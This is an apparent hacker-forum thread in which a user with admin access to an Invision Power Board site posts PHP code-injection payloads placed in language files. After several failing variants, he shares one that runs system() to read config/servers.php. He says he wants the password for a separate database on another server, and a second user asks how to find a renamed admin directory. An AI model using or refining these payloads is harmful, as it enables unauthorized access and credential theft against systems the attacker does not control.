Waraxe IT Security Portal

RG007145 · Active user

So I have root administrative access to IPB.

And I can add new general settings, but since I screwed up the first time it now always does some "no such file" with fopen() and gets into an infinite loop.

The language files are now my only way of getting contents of files - BUT, it does not work Crying or Very sad

I can run:
${${system(ls,$output)}}
${${print $output}}

But anything like:
${${system(cat ../config/servers.php,$output)}}
${${print $output}}

Or:
${${system('cat ../config/servers.php', $output)}}
${${print $output}}

Gives me errors like unexpected T_DOUBLE_ARROW, UNEXPECTED_T_STRING and unexpected T_CONSTANT_ENCAPSED_STRING.

(On my local install some of this works fine - maybe a PHP version thing?)

Any ideas?

nuker · Active user

If you have administrative access why dont you just log into the ACP and make all the changes you want from there?

RG007145 · Active user

Because the servers.php file is accessing a different database on a different server whose password I want...

RG007145 · Active user

Here's what finally worked:

${${print $query='cat /home/***/***/config/servers.php'}}
${${system($query,$out)}}
${${print $out}}

And I spent so much time figuring it out...lolz.

nuker · Active user

Ahh i didnt know that was possible. By the way, do you know a way to find the admin directory if it has been renamed?